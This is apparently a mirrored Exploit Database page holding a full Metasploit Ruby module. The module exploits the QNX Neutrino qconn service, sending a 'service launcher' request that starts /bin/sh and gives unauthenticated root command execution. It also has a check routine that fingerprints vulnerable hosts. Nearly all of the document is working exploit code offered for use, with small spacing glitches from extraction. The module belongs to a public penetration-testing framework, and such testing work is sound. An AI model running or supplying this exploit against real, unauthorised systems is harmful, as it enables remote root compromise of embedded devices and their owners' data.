QNX QCONN – Remote Command Execution (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2012-10-10
• 类别：

  • remote
  平台：

  • unix
• 来源：https://www.exploit-db.com/exploits/21852/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = ExcellentRanking
  
  	include Msf::Exploit::Remote::Tcp
  
  	def initialize(info={})
  		super(update_info(info,
  			'Name' => "QNX QCONN Remote Command Execution Vulnerability",
  			'Description'=> %q{
  				This module exploits a vulnerability in the qconn component of
  				QNX Neutrino which can be abused to allow unauthenticated users to
  				execute arbitrary commands under the context of the 'root' user.
  			},
  			'License'=> MSF_LICENSE,
  			'Author' =>
  				[
  					'David Odell', # Discovery
  					'Mor!p3r <moriper[at]gmail.com>', # PoC
  					'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
  				],
  			'References' =>
  				[
  					['EDB', '21520'],
  					['URL', 'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos'],
  					['URL', 'http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html'],
  				],
  			'Payload'=>
  				{
  					'BadChars'=> '',
  					'DisableNops' => true,
  					'Compat'=>
  						{
  							'PayloadType' => 'cmd_interact',
  							'ConnectionType' => 'find',
  						},
  				},
  			'DefaultOptions'=>
  				{
  					'WfsDelay' => 10,
  					'PAYLOAD'=> 'cmd/unix/interact',
  				},
  			'Platform' => 'unix',# QNX Neutrino
  			'Arch' => ARCH_CMD,
  			'Targets'=>
  				[
  					# Tested on QNX Neutrino 6.5 SP1
  					['Automatic Targeting', { 'auto' => true }]
  				],
  			'Privileged' => false,
  			'DisclosureDate' => 'Sep 4 2012',
  			'DefaultTarget'=> 0))
  
  		register_options(
  			[
  				Opt::RPORT(8000)
  			], self.class)
  	end
  
  	def check
  
  		@peer = "#{rhost}:#{rport}"
  
  		# send check
  		fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
  		print_status("#{@peer} - Sending check")
  		connect
  		req= "service launcher\n"
  		req << "start/flags run /bin/echo /bin/echo #{fingerprint}\n"
  		sock.put(req)
  		res= sock.get
  		disconnect
  
  		# check response
  		ifres and res =~ /#{fingerprint}/
  			return Exploit::CheckCode::Vulnerable
  		elsif res and res =~ /QCONN/
  			return Exploit::CheckCode::Detected
  		else
  			return Exploit::CheckCode::Unknown
  		end
  
  	end
  
  	def exploit
  
  		@peer = "#{rhost}:#{rport}"
  
  		# send payload
  		req= "service launcher\n"
  		req << "start/flags run /bin/sh -\n"
  		print_status("#{@peer} - Sending payload (#{req.length} bytes)")
  		connect
  		sock.put(req)
  		res= sock.get
  
  		# check response
  		if res and res =~ /No controlling tty/
  			print_good("#{@peer} - Payload sent successfully")
  		else
  			print_error("#{@peer} - Sending payload failed")
  		end
  		handler
  		disconnect
  
  	end
  end